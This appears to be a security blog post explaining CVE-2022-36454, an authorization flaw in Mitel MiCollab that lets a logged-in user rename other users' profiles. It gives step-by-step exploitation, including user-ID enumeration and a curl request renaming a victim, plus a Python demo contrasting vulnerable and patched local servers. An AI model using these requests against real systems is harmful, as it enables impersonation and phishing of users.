A critical vulnerability, CVE-2022-36454, has been discovered in the MiCollab Client API of Mitel MiCollab, affecting versions up to and including 9.5.0.101. Because of improper authorization controls, an authenticated user can modify profile parameters without the checks that should apply to them. In simple terms: a logged-in user can change profile parameters such as the display name and impersonate another user's name. In this post, I'll explain how this bug works, demonstrate a sample exploit, and provide further resources.
How the Vulnerability Works
The MiCollab Client API is supposed to prevent users from accessing or changing data they do not own. The advisory describes the flaw as improper authorization controls on profile parameters: the backend API checks that the request comes from an authenticated user (authentication), but it does not check that this particular user is allowed to make this particular change (authorization).
As reconstructed in the steps below, a logged-in user who knows a target's user ID can send the profile-update request for that ID instead of their own, because nothing compares the caller's identity to the object being written. That is a classic case of *Insecure Direct Object Reference* (IDOR), also called broken object-level authorization. Note that the endpoint paths, user IDs and field names in the walkthrough are illustrative; the advisory does not publish them, so expect them to differ on a real deployment.
1. Get Your User Token
Log in to your MiCollab web interface. Open the browser’s developer tools to capture your session token or cookie for the API.
2. Find the Target User's ID
You might find this by browsing the app's user directory or via an endpoint such as (illustrative path, not taken from the advisory)
GET /uapi/user
Suppose the response is JSON like:
[
{
"id": "1023",
"name": "Alice Smith"
},
{
"id": "1055",
"name": "Bob Jones"
}
]
3. Craft the Malicious Request
With the victim's ID (say, 1055), you send the profile-update request for that user instead of your own. Whether the server expects PATCH or POST, and the exact path, is deployment-specific; the example below uses POST:
POST /uapi/users/1055
Authorization: Bearer <your-session-token>
Content-Type: application/json
{
"name": "Hacker Joe"
}
Or with curl:
curl -X POST \
https://<mi-collab-server>/uapi/users/1055 \
-H "Authorization: Bearer <your-session-token>" \
-H "Content-Type: application/json" \
-d '{"name":"Hacker Joe"}'
4. Result: Impersonation
If the API is vulnerable, Bob Jones’s profile will now read “Hacker Joe”—even though you’re not Bob. In chat or directories, people now see you as him.
- Social Engineering: The attacker can now send malicious or misleading messages as another user.
- Confusion and Trust Issues: Users may trust the impersonated messages, leading to data leaks or further phishing.
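The missing check from "How the Vulnerability Works" and the request from steps 1 through 4, in one added Python example written for this post (not Mitel's code and not from the advisory). It stands up a constructed stand-in for the profile-update endpoint, assumed here to be POST /uapi/users/<id> with a Bearer token as in the curl above, in an unpatched mode (authentication only) and a patched mode (caller must equal target, updatable fields allow-listed, plus an added check that refuses a display name already used by another user), then sends the same request Alice would send against Bob's ID to each. The user IDs, names and tokens are constructed; the endpoint path, the auth scheme and the hardening are assumptions, not the vendor's fix.

```python
import json
import threading
import http.client
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed stand-in directory (not real MiCollab data): user id -> display
# name plus the bearer token that authenticates as that user.
USERS = {
    "1023": {"name": "Alice Smith", "token": "tok-alice"},
    "1055": {"name": "Bob Jones", "token": "tok-bob"},
}
ORIGINAL_NAMES = {uid: rec["name"] for uid, rec in USERS.items()}
ALLOWED_FIELDS = {"name"}  # assumption: only the display name is client-updatable


def authenticate(headers):
    """Map an 'Authorization: Bearer <token>' header to a user id, or None."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    token = auth[len("Bearer "):]
    return next((uid for uid, rec in USERS.items() if rec["token"] == token), None)


def authorize_update(caller_id, target_id, payload, patched):
    """Return (http_status, reason) for caller_id writing payload to target_id.

    Unpatched: authentication is the only check, nothing compares the caller to
    the object being written (the IDOR). Patched: object-level check, field
    allow-list, and an added display-name collision check (our assumption).
    """
    if caller_id is None:
        return 401, "not authenticated"
    if not isinstance(payload, dict):
        return 400, "body must be a JSON object"
    if not patched:
        return 200, "ok"  # the missing authorization check
    if caller_id != target_id:
        return 403, "cannot modify another user's profile"
    unknown = set(payload) - ALLOWED_FIELDS
    if unknown:
        return 400, "fields not updatable: " + ", ".join(sorted(unknown))
    wanted = str(payload.get("name", "")).strip().casefold()
    if any(uid != caller_id and rec["name"].casefold() == wanted for uid, rec in USERS.items()):
        return 409, "display name already belongs to another user"
    return 200, "ok"


def make_handler(patched):
    """Request handler for the assumed POST /uapi/users/<id> profile endpoint."""

    class ProfileHandler(BaseHTTPRequestHandler):
        def do_POST(self):
            parts = self.path.strip("/").split("/")
            if parts[:2] != ["uapi", "users"] or len(parts) != 3 or parts[2] not in USERS:
                return self._reply(404, {"error": "no such user"})
            target = parts[2]
            try:
                length = int(self.headers.get("Content-Length", "0"))
                payload = json.loads(self.rfile.read(length) or b"{}")
            except ValueError:  # bad length or malformed JSON
                return self._reply(400, {"error": "malformed body"})
            status, reason = authorize_update(authenticate(self.headers), target, payload, patched)
            if status == 200:
                USERS[target].update({k: v for k, v in payload.items() if k in ALLOWED_FIELDS})
            self._reply(status, {"result": reason})

        def _reply(self, status, body):
            data = json.dumps(body).encode()
            self.send_response(status)
            self.send_header("Content-Type", "application/json")
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *args):  # keep demo output quiet
            pass

    return ProfileHandler


def probe(host, port, token, target_id, new_name):
    """Send the same request as the curl command above and return the HTTP status."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", f"/uapi/users/{target_id}",
                 body=json.dumps({"name": new_name}).encode(),
                 headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"})
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status


def run_check(patched, token, target_id, new_name):
    """Start a stand-in server, fire one probe, return (status, target's name afterwards)."""
    for uid, name in ORIGINAL_NAMES.items():
        USERS[uid]["name"] = name  # reset state between runs
    server = ThreadingHTTPServer(("127.0.0.1", 0), make_handler(patched))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        status = probe("127.0.0.1", server.server_address[1], token, target_id, new_name)
    finally:
        server.shutdown()
        server.server_close()
    return status, USERS.get(target_id, {}).get("name")


if __name__ == "__main__":
    for patched in (False, True):
        status, name = run_check(patched, "tok-alice", "1055", "Hacker Joe")
        verdict = "VULNERABLE: cross-user write accepted" if status == 200 else "check enforced"
        print(f"patched={patched}: HTTP {status}, user 1055 now reads {name!r} -> {verdict}")
```

Run it and the unpatched server answers 200 with Bob's name rewritten while the patched one answers 403 with Bob untouched; a 200 on a cross-user write is the vulnerable condition to look for, and probe() should only be pointed at a real host you are authorized to test. The collision check in patched mode covers the advisory's own wording, a user editing their own profile to take another user's name, which the cross-user walkthrough alone would not stop.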
References
Mitel Advisory: Mitel Security Bulletin 22-0017
Patch: Mitel MiCollab 9.6 or later (update required)
Closing Thoughts
CVE-2022-36454 is a classic but very dangerous access control weakness. As you've seen above, missing authorization checks let attackers do things that should never be allowed, like making one user look like another. Keep your systems updated, and on the server side enforce object-level authorization on every request that touches a sensitive object such as a user profile: authentication tells you who is calling, not what they are allowed to change.
*Stay safe & patch your systems! For more, check out the above advisories and keep an eye out for these simple but devastating bugs.*
Timeline
Published on: 10/25/2022 18:15:00 UTC
Last modified on: 10/28/2022 19:21:00 UTC